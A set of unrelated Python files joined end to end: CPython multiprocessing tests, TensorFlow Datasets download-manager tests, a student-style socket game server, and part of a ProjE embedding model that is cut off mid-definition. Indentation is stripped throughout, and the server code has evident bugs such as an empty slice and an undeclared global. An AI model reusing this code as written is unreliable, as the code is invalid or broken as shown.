a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, foo, arr, string):
x.value *= 2
y.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', range(10), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
@unittest.skipUnless(test_support.check_impl_detail(pypy=False), "pypy ctypes differences")
def test_copy(self):
foo = _Foo(2, 5.0)
bar = copy(foo)
foo.x = 0
foo.y = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
test_support.gc_collect()
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
#
# Test that from ... import * works for each module
#
class _TestImportStar(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_import(self):
modules = [
'multiprocessing', 'multiprocessing.connection',
'multiprocessing.heap', 'multiprocessing.managers',
'multiprocessing.pool', 'multiprocessing.process',
'multiprocessing.synchronize', 'multiprocessing.util'
]
if HAS_REDUCTION:
modules.append('multiprocessing.reduction')
if c_int is not None:
# This module requires _ctypes
modules.append('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
for attr in getattr(mod, '__all__', ()):
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.daemon = True
p.start()
self.assertEqual(LEVEL1, reader.recv())
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.daemon = True
p.start()
self.assertEqual(LEVEL2, reader.recv())
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = _multiprocessing.Connection(44977608)
self.assertRaises(IOError, conn.poll)
self.assertRaises(IOError, _multiprocessing.Connection, -1)
#
# Functions used to create test cases from the base ones in this module
#
def get_attributes(Source, names):
d = {}
for name in names:
obj = getattr(Source, name)
if type(obj) == type(get_attributes):
obj = staticmethod(obj)
d[name] = obj
return d
def create_test_cases(Mixin, type):
result = {}
glob = globals()
Type = type.capitalize()
for name in glob.keys():
if name.startswith('_Test'):
base = glob[name]
if type in base.ALLOWED_TYPES:
newname = 'With' + Type + name[1:]
class Temp(base, unittest.TestCase, Mixin):
pass
result[newname] = Temp
Temp.__name__ = newname
Temp.__module__ = Mixin.__module__
return result
#
# Create test cases
#
class ProcessesMixin(object):
TYPE = 'processes'
Process = multiprocessing.Process
locals().update(get_attributes(multiprocessing, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'RawValue',
'RawArray', 'current_process', 'active_children', 'Pipe',
'connection', 'JoinableQueue'
)))
testcases_processes = create_test_cases(ProcessesMixin, type='processes')
globals().update(testcases_processes)
class ManagerMixin(object):
TYPE = 'manager'
Process = multiprocessing.Process
manager = object.__new__(multiprocessing.managers.SyncManager)
locals().update(get_attributes(manager, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'list', 'dict',
'Namespace', 'JoinableQueue'
)))
testcases_manager = create_test_cases(ManagerMixin, type='manager')
globals().update(testcases_manager)
class ThreadsMixin(object):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
locals().update(get_attributes(multiprocessing.dummy, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'current_process',
'active_children', 'Pipe', 'connection', 'dict', 'list',
'Namespace', 'JoinableQueue'
)))
testcases_threads = create_test_cases(ThreadsMixin, type='threads')
globals().update(testcases_threads)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _ThisSubProcess(q):
try:
item = q.get(block=False)
except Queue.Empty:
pass
def _TestProcess(q):
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_ThisSubProcess, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=_TestProcess, args=(queue,))
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
testcases_other = [OtherTest, TestInvalidHandle, TestInitializers,
TestStdinBadfiledescriptor]
#
#
#
def test_main(run=None):
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, see issue 3111!")
check_enough_semaphores()
if run is None:
from test.test_support import run_unittest as run
util.get_temp_dir() # creates temp directory for use by all processes
multiprocessing.get_logger().setLevel(LOG_LEVEL)
ProcessesMixin.pool = multiprocessing.Pool(4)
ThreadsMixin.pool = multiprocessing.dummy.Pool(4)
ManagerMixin.manager.__init__()
ManagerMixin.manager.start()
ManagerMixin.pool = ManagerMixin.manager.Pool(4)
testcases = (
sorted(testcases_processes.values(), key=lambda tc:tc.__name__) +
sorted(testcases_threads.values(), key=lambda tc:tc.__name__) +
sorted(testcases_manager.values(), key=lambda tc:tc.__name__) +
testcases_other
)
loadTestsFromTestCase = unittest.defaultTestLoader.loadTestsFromTestCase
suite = unittest.TestSuite(loadTestsFromTestCase(tc) for tc in testcases)
# (ncoghlan): Whether or not sys.exc_clear is executed by the threading
# module during these tests is at least platform dependent and possibly
# non-deterministic on any given platform. So we don't mind if the listed
# warnings aren't actually raised.
with test_support.check_py3k_warnings(
(".+__(get|set)slice__ has been removed", DeprecationWarning),
(r"sys.exc_clear\(\) not supported", DeprecationWarning),
quiet=True):
run(suite)
ThreadsMixin.pool.terminate()
ProcessesMixin.pool.terminate()
ManagerMixin.pool.terminate()
ManagerMixin.manager.shutdown()
del ProcessesMixin.pool, ThreadsMixin.pool, ManagerMixin.pool
def main():
test_main(unittest.TextTestRunner(verbosity=2).run)
if __name__ == '__main__':
main()
|
download_manager_test.py
|
# coding=utf-8
# Copyright 2019 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tensorflow_datasets.core.download.download_manager."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import hashlib
import json
import os
import re
import tempfile
import threading
from absl.testing import absltest
import promise
import tensorflow as tf
from tensorflow_datasets import testing
from tensorflow_datasets.core.download import checksums as checksums_lib
from tensorflow_datasets.core.download import download_manager as dm
from tensorflow_datasets.core.download import resource as resource_lib
ZIP = resource_lib.ExtractMethod.ZIP
TAR = resource_lib.ExtractMethod.TAR
NO_EXTRACT = resource_lib.ExtractMethod.NO_EXTRACT
def _get_promise_on_event(result=None, error=None):
"""Returns (event, Promise). Promise is fulfilled when `event.set()`."""
event = threading.Event()
def callback(resolve, reject):
def inside():
event.wait()
if error is not None:
reject(error)
resolve(result)
t = threading.Thread(target=inside)
t.daemon = True
t.start()
return event, promise.Promise(callback)
def _sha256(str_):
return hashlib.sha256(str_.encode('utf8')).hexdigest()
class Artifact(object):
# For testing only.
def __init__(self, name, url=None):
url = url or 'http://foo-bar.ch/%s' % name
content = 'content of %s' % name
self.url = url
self.content = content
self.size = len(content)
self.sha = _sha256(content)
self.size_checksum = (self.size, self.sha)
self.checksum_size = (self.sha, self.size)
self.dl_fname = resource_lib.get_dl_fname(url, self.sha)
self.dl_tmp_dirname = resource_lib.get_dl_dirname(url)
class DownloadManagerTest(testing.TestCase):
def _add_file(self, path, content='', mode='w'):
"""Returns open file handle."""
temp_f = tempfile.NamedTemporaryFile(mode=mode, delete=False)
self.files_content[path] = temp_f.name
temp_f.write(content)
temp_f.close()
self.existing_paths.append(path)
return temp_f
def setUp(self):
self.addCleanup(absltest.mock.patch.stopall)
self.existing_paths = []
self.made_dirs = []
self.dl_results = {}
self.extract_results = {}
self.file_names = {} # resource fname -> original file name
def list_directory(path):
fname = os.path.basename(path).rsplit('.', 2)[0] # suffix is '.tmp.$uuid'
return [self.file_names.get(fname, 'file_with_no_ext')]
self.files_content = {}
def open_(path, mode='r'):
if 'w' in mode:
self._add_file(path)
return open(self.files_content[path], mode)
def rename(from_, to, overwrite=False):
del overwrite
if from_ in self.files_content:
self.existing_paths.append(to)
self.existing_paths.remove(from_)
self.files_content[to] = self.files_content.pop(from_)
self.gfile_patch = absltest.mock.patch.object(
tf.io,
'gfile',
exists=lambda path: path in self.existing_paths,
makedirs=self.made_dirs.append,
# Used to get name of file as downloaded:
listdir=list_directory,
GFile=open_,
rename=absltest.mock.Mock(side_effect=rename),
)
self.gfile = self.gfile_patch.start()
absltest.mock.patch.object(checksums_lib, 'store_checksums').start()
def tearDown(self):
self.gfile_patch.stop()
def _write_info(self, path, info):
content = json.dumps(info, sort_keys=True)
self._add_file(path, content)
def _get_manager(self, force_download=False, force_extraction=False,
checksums=None, dl_dir='/dl_dir',
extract_dir='/extract_dir'):
manager = dm.DownloadManager(
dataset_name='mnist',
download_dir=dl_dir,
extract_dir=extract_dir,
manual_dir='/manual_dir',
force_download=force_download,
force_extraction=force_extraction,
)
if checksums:
manager._sizes_checksums = checksums
download = absltest.mock.patch.object(
manager._downloader,
'download',
side_effect=lambda url, tmpdir_path: self.dl_results[url])
self.downloader_download = download.start()
extract = absltest.mock.patch.object(
manager._extractor,
'extract',
side_effect=lambda path, method, dest: self.extract_results[path])
self.extractor_extract = extract.start()
return manager
def test_download(self):
"""One file in cache, one not."""
a, b, c = [Artifact(i) for i in 'abc']
urls = {
'cached': a.url,
'new': b.url,
'info_deleted': c.url,
}
_ = [self._add_file(path, content) for path, content in [ # pylint: disable=g-complex-comprehension
('/dl_dir/%s' % a.dl_fname, a.content),
('/dl_dir/%s.INFO' % a.dl_fname, 'content of info file a'),
# INFO file of c has been deleted:
('/dl_dir/%s' % c.dl_fname, c.content),
]]
dl_b, self.dl_results[b.url] = _get_promise_on_event(b.checksum_size)
dl_c, self.dl_results[c.url] = _get_promise_on_event(c.checksum_size)
manager = self._get_manager(checksums=dict(
(art.url, art.size_checksum) for art in (a, b, c)))
dl_b.set()
dl_c.set()
downloads = manager.download(urls)
expected = {
'cached': '/dl_dir/%s' % a.dl_fname,
'new': '/dl_dir/%s' % b.dl_fname,
'info_deleted': '/dl_dir/%s' % c.dl_fname,
}
self.assertEqual(downloads, expected)
def test_extract(self):
"""One file already extracted, one file with NO_EXTRACT, one to extract."""
cached = resource_lib.Resource(path='/dl_dir/cached', extract_method=ZIP)
new_ = resource_lib.Resource(path='/dl_dir/new', extract_method=TAR)
no_extract = resource_lib.Resource(path='/dl_dir/noextract',
extract_method=NO_EXTRACT)
files = {
'cached': cached,
'new': new_,
'noextract': no_extract,
}
self.existing_paths.append('/extract_dir/ZIP.cached')
extracted_new, self.extract_results['/dl_dir/new'] = (
_get_promise_on_event('/extract_dir/TAR.new'))
manager = self._get_manager()
extracted_new.set()
res = manager.extract(files)
expected = {
'cached': '/extract_dir/ZIP.cached',
'new': '/extract_dir/TAR.new',
'noextract': '/dl_dir/noextract',
}
self.assertEqual(res, expected)
def test_extract_twice_parallel(self):
# Make sure calling extract twice on same resource actually does the
# extraction once.
extracted_new, self.extract_results['/dl_dir/foo.tar'] = (
_get_promise_on_event('/extract_dir/TAR.foo'))
manager = self._get_manager()
extracted_new.set()
out1 = manager.extract(['/dl_dir/foo.tar', '/dl_dir/foo.tar'])
out2 = manager.extract('/dl_dir/foo.tar')
expected = '/extract_dir/TAR.foo'
self.assertEqual(out1[0], expected)
self.assertEqual(out1[1], expected)
expected = '/extract_dir/TAR.foo'
self.assertEqual(out2, expected)
# Result is memoize so extract has only been called once
self.assertEqual(1, self.extractor_extract.call_count)
def test_download_and_extract(self):
a, b = Artifact('a.zip'), Artifact('b')
self.file_names[a.dl_tmp_dirname] = 'a.zip'
dl_a, self.dl_results[a.url] = _get_promise_on_event(a.checksum_size)
dl_b, self.dl_results[b.url] = _get_promise_on_event(b.checksum_size)
ext_a, self.extract_results['/dl_dir/%s' % a.dl_fname] = (
_get_promise_on_event('/extract_dir/ZIP.%s' % a.dl_fname))
# url_b doesn't need any extraction.
for event in [dl_a, dl_b, ext_a]:
event.set()
# Result is the same after caching:
manager = self._get_manager(checksums={
a.url: a.size_checksum,
b.url: b.size_checksum,
})
res = manager.download_and_extract({'a': a.url, 'b': b.url})
expected = {
'a': '/extract_dir/ZIP.%s' % a.dl_fname,
'b': '/dl_dir/%s' % b.dl_fname,
}
self.assertEqual(res, expected)
def test_download_and_extract_archive_ext_in_fname(self):
# Make sure extraction method is properly deduced from original fname, and
# not from URL.
a = Artifact('a', url='http://a?key=1234')
self.file_names[a.dl_tmp_dirname] = 'a.zip'
dl, self.dl_results[a.url] = _get_promise_on_event(a.checksum_size)
ext, self.extract_results['/dl_dir/%s' % a.dl_fname] = (
_get_promise_on_event('/extract_dir/ZIP.%s' % a.dl_fname))
dl.set()
ext.set()
manager = self._get_manager(checksums={
a.url: a.size_checksum,
})
res = manager.download_and_extract({'a': a.url})
expected = {
'a': '/extract_dir/ZIP.%s' % a.dl_fname,
}
self.assertEqual(res, expected)
def test_download_and_extract_already_downloaded(self):
a = Artifact('a.zip')
self.file_names[a.dl_tmp_dirname] = 'a.zip'
# File was already downloaded:
self._add_file('/dl_dir/%s' % a.dl_fname)
self._write_info('/dl_dir/%s.INFO' % a.dl_fname,
{'original_fname': 'a.zip'})
ext_a, self.extract_results['/dl_dir/%s' % a.dl_fname] = (
_get_promise_on_event('/extract_dir/ZIP.%s' % a.dl_fname))
ext_a.set()
manager = self._get_manager(checksums={
a.url: a.size_checksum,
})
res = manager.download_and_extract(a.url)
expected = '/extract_dir/ZIP.%s' % a.dl_fname
self.assertEqual(res, expected)
def test_force_download_and_extract(self):
a = Artifact('a.tar.gz')
# resource was already downloaded / extracted:
self.existing_paths = ['/dl_dir/%s' % a.dl_fname,
'/extract_dir/TAR_GZ.%s' % a.dl_fname]
self.file_names[a.dl_tmp_dirname] = 'b.tar.gz'
self._write_info('/dl_dir/%s.INFO' % a.dl_fname,
{'original_fname': 'b.tar.gz'})
dl_a, self.dl_results[a.url] = _get_promise_on_event(a.checksum_size)
ext_a, self.extract_results['/dl_dir/%s' % a.dl_fname] = (
_get_promise_on_event('/extract_dir/TAR_GZ.%s' % a.dl_fname))
dl_a.set()
ext_a.set()
manager = self._get_manager(
force_download=True, force_extraction=True,
checksums={
a.url: a.size_checksum,
})
res = manager.download_and_extract(a.url)
expected = '/extract_dir/TAR_GZ.%s' % a.dl_fname
self.assertEqual(expected, res)
# Rename after download:
(from_, to), kwargs = self.gfile.rename.call_args
self.assertTrue(re.match(
r'/dl_dir/%s\.tmp\.[a-h0-9]{32}/b.tar.gz' % a.dl_tmp_dirname,
from_))
self.assertEqual('/dl_dir/%s' % a.dl_fname, to)
self.assertEqual(kwargs, {'overwrite': True})
self.assertEqual(1, self.downloader_download.call_count)
self.assertEqual(1, self.extractor_extract.call_count)
def test_wrong_checksum(self):
a = Artifact('a.tar.gz')
sha_b = _sha256('content of another file')
dl_a, self.dl_results[a.url] = _get_promise_on_event(a.checksum_size)
dl_a.set()
manager = self._get_manager(checksums={
a.url: (a.size, sha_b),
})
with self.assertRaises(dm.NonMatchingChecksumError):
manager.download(a.url)
self.assertEqual(0, self.extractor_extract.call_count)
def test_ignore_wrong_checksum(self):
a = Artifact('a.tar.gz')
sha_b = _sha256('content of another file')
dl_a, self.dl_results[a.url] = _get_promise_on_event(a.checksum_size)
dl_a.set()
manager = self._get_manager(checksums={
a.url: (a.size, sha_b),
})
manager.set_ignore_checksums(True)
res = manager.download(a.url)
expected = '/dl_dir/%s' % a.dl_fname
self.assertEqual(expected, res)
if __name__ == '__main__':
testing.test_main()
|
server.py
|
import socket
import threading
import board_game as bg
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#serv = socket.gethostbyname(socket.gethostname())
serv = '0.0.0.0'
port = 5959
addr = (serv, 5959)
s.bind(addr)
player_count = 1
gameboard = bg.Board()
playerList = [0]
actionDict = {"move north": lambda x: gameboard.moveNorth(x),"move south":lambda p: gameboard.moveSouth(p), "move east": lambda p: gameboard.moveEast(p), "move west": lambda p: gameboard.moveWest(p), "fire north":lambda p: gameboard.fireNorth(p), "fire south":lambda p: gameboard.fireSouth(p), "fire east": lambda p: gameboard.fireEast(p), "fire west": lambda p: gameboard.fireWest(p), "echo north":lambda p: gameboard.echoNorth(p), "echo south":lambda p: gameboard.echoSouth(p), "echo east": lambda p: gameboard.echoEast(p), "echo west": lambda p: gameboard.echoWest(p)}
def handle_client(conn, addr):
print(f"New Connection ----> {addr} connected")
global playerList
global gameboard
connected = True
conn.send(bytes("YeeeHAw I'm The Blind Bandit and I'm gonna eat you","utf-8"))
playerNum = None
while connected:
msg = conn.recv(1024).decode("utf-8")
msgList = msg.split()
if msg == "Client Connected":
conn.send(bytes("Set Player {}".format(player_count)))
playerList += bg.Player(player_count)
playerNum = player_count
player_count += 1
elif msgList[0] == "0":
actionDict[msg[2:0]](playerList[0])
elif msgList[0] == "1":
actionDict[msg[2:0]](playerList[1])
if len(bg.soundList) != 0:
num, snd = gameboard.soundList[0]
if num == playerNum:
msg = str(playernum) + " " + snd
conn.send(bytes(msg, "utf-8"))
bg.soundList.pop(0)
print(msg)
conn.close()
def start():
s.listen()
print(f"Listening on {serv}")
while True:
conn, addr = s.accept()
thread = threading.Thread(target=handle_client, args=(conn, addr))
thread.start()
print(f"Active Connections ----> {threading.activeCount() - 4}")
print ("Server Starting.......")
start()
#2 players
s.listen(2)
while True:
clientsocket, address = s.accept()
print(f"Connection from {address} successful.")
clientsocket.send(bytes("James smells weird!", "utf-8"))
|
ProjE_softmax_noweight.py
|
import argparse
import math
import os.path
import timeit
from multiprocessing import JoinableQueue, Queue, Process
import numpy as np
import tensorflow as tf
class ProjE:
@property
def n_entity(self):
return self.__n_entity
@property
def n_train(self):
return self.__train_triple.shape[0]
@property
def trainable_variables(self):
return self.__trainable
@property
def hr_t(self):
return self.__hr_t
@property
def tr_h(self):
return self.__tr_h
@property
def ent_embedding(self):
return self.__ent_embedding
@property
def rel_embedding(self):
return self.__rel_embedding
def training_data(self, batch_size=100):
n_triple = len(self.__train_triple)
rand_idx = np.random.permutation(n_triple)
start = 0
while start < n_triple:
end = min(start + batch_size, n_triple)
hr_tlist, hr_tweight, tr_hlist, tr_hweight = self.corrupted_training(
self.__train_triple[rand_idx[start:end]])
yield hr_tlist, hr_tweight, tr_hlist, tr_hweight
start = end
def raw_training_data(self, batch_size=100):
n_triple = len(self.__train_triple)
rand_idx = np.random.permutation(n_triple)
start = 0
while start < n_triple:
end = min(start + batch_size, n_triple)
yield self.__train_triple[rand_idx[start:end]]
start = end
def testing_data(self, batch_size=100):
n_triple = len(self.__test_triple)
start = 0
while start < n_triple:
end = min(start + batch_size, n_triple)
yield self.__test_triple[start:end, :]
start = end
def validation_data(self, batch_size=100):
n_triple = len(self.__valid_triple)
start = 0
while start < n_triple:
end = min(start + batch_size, n_triple)
yield self.__test_triple[start:end, :]
start = end
def corrupted_training(self, htr):
# [head(tail), relation, #of_total_positive_candidates, positive_instances..., negative_instances...]
hr_tlist = list()
hr_tweight = list()
tr_hlist = list()
tr_hweight = list()
for idx in range(htr.shape[0]):
if np.random.uniform(-1, 1) > 0: # t r predict h
tr_hweight.append(
[1. if x in self.__tr_h[htr[idx, 1]][htr[idx, 2]] else 0. for x in range(self.__n_entity)])
tr_hlist.append([htr[idx, 1], htr[idx, 2]])
else: # h r predict t
hr_tweight.append(
[1. if x in self.__hr_t[htr[idx, 0]][htr[idx, 2]] else 0. for x in range(self.__n_entity)])
hr_tlist.append([htr[idx, 0], htr[idx, 2]])
return np.asarray(hr_tlist, dtype=np.int32), np.asarray(hr_tweight, dtype=np.float32), \
np.asarray(tr_hlist, dtype=np.int32), np.asarray(tr_hweight, dtype=np.float32)
def __init__(self, data_dir, embed_dim=100, combination_method='simple', dropout=0.5, neg_weight=0.5):
if combination_method.lower() not in ['simple', 'matrix']:
raise NotImplementedError("ProjE does not support using %s as combination method." % combination_method)
self.__combination_method = combination_method
self.__embed_dim = embed_dim
self.__initialized = False
self.__trainable = list()
self.__dropout = dropout
with open(os.path.join(data_dir, 'entity2id.txt'), 'r', encoding='utf-8') as f:
self.__n_entity = len(f.readlines())
with open(os.path.join(data_dir, 'entity2id.txt'), 'r', encoding='utf-8') as f:
self.__entity_id_map = {x.strip().split('\t')[0]: int(x.strip().split('\t')[1]) for x in f.readlines()}
self.__id_entity_map = {v: k for k, v in self.__entity_id_map.items()}
print("N_ENTITY: %d" % self.__n_entity)
with open(os.path.join(data_dir, 'relation2id.txt'), 'r', encoding='utf-8') as f:
self.__n_relation = len(f.readlines())
with open(os.path.join(data_dir, 'relation2id.txt'), 'r', encoding='utf-8') as f:
self.__relation_id_map = {x.strip().split('\t')[0]: int(x.strip().split('\t')[1]) for x in f.readlines()}
self.__id_relation_map = {v: k for k, v in self.__entity_id_map.items()}
print("N_RELATION: %d" % self.__n_relation)
def load_triple(file_path):
with open(file_path, 'r', encoding='utf-8') as f_triple:
return np.asarray([[self.__entity_id_map[x.strip().split('\t')[0]],
self.__entity_id_map[x.strip().split('\t')[1]],
self.__relation_id_map[x.strip().split('\t')[2]]] for x in f_triple.readlines()],
dtype=np.int32)
def gen_hr_t(triple_data):
hr_t = dict()
for h, t, r in triple_data:
if h not in hr_t:
hr_t[h] = dict()
if r not in hr_t[h]:
hr_t[h][r] = set()
hr_t[h][r].add(t)
return hr_t
def gen_tr_h(triple_data):
tr_h = dict()
for h, t, r in triple_data:
if t not in tr_h:
tr_h[t] = dict()
if r not in tr_h[t]:
tr_h[t][r] = set()
tr_h[t][r].add(h)
return tr_h
self.__train_triple = load_triple(os.path.join(data_dir, 'train.txt'))
print("N_TRAIN_TRIPLES: %d" % self.__train_triple.shape[0])
self.__test_triple = load_triple(os.path.join(data_dir, 'test.txt'))
print("N_TEST_TRIPLES: %d" % self.__test_triple.shape[0])
self.__valid_triple = load_triple(os.path.join(data_dir, 'valid.txt'))
print("N_VALID_TRIPLES: %d" % self.__valid_triple.shape[0])
self.__train_hr_t = gen_hr_t(self.__train_triple)
self.__train_tr_h = gen_tr_h(self.__train_triple)
self.__test_hr_t = gen_hr_t(self.__test_triple)
self.__test_tr_h = gen_tr_h(self.__test_triple)
self.__hr_t = gen_hr_t(np.concatenate([self.__train_triple, self.__test_triple, self.__valid_triple], axis=0))
self.__tr_h = gen_tr_h(np.concatenate([self.__train_triple, self.__test_triple, self.__valid_triple], axis=0))
bound = 6 / math.sqrt(embed_dim)
with tf.device('/cpu'):
self.__ent_embedding = tf.get_variable("ent_embedding", [self.__n_entity, embed_dim],
initializer=tf.random_uniform_initializer(minval=-bound,
maxval=bound,
seed=345))
self.__trainable.append(self.__ent_embedding)
self.__rel_embedding = tf.get_variable("rel_embedding", [self.__n_relation, embed_dim],
initializer=tf.random_uniform_initializer(minval=-bound,
maxval=bound,
seed=346))
self.__trainable.append(self.__rel_embedding)
if combination_method.lower() == 'simple':
self.__hr_weighted_vector = tf.get_variable("simple_hr_combination_weights", [embed_dim * 2],
initializer=tf.random_uniform_initializer(minval=-bound,
maxval=bound,
seed=445))
self.__tr_weighted_vector = tf.get_variable("simple_tr_combination_weights", [embed_dim * 2],
initializer=tf.random_uniform_initializer(minval=-bound,
maxval=bound,
seed=445))
self.__trainable.append(self.__hr_weighted_vector)
self.__trainable.append(self.__tr_weighted_vector)
self.__hr_combination_bias = tf.get_variable("combination_bias_hr",
initializer=tf.zeros([embed_dim]))
self.__tr_combination_bias = tf.get_variable("combination_bias_tr",
initializer=tf.zeros([embed_dim]))
self.__trainable.append(self.__hr_combination_bias)
self.__trainable.append(self.__tr_combination_bias)
else:
self.__hr_combination_matrix = tf.get_variable("matrix_hr_combination_layer",
[embed_dim * 2, embed_dim],
initializer=tf.random_uniform_initializer(minval=-bound,
maxval=bound,
seed=555))
self.__tr_combination_matrix = tf.get_variable("matrix_tr_combination_layer",
[embed_dim * 2, embed_dim],
initializer=tf.random_uniform_initializer(minval=-bound,
maxval=bound,
seed=555))
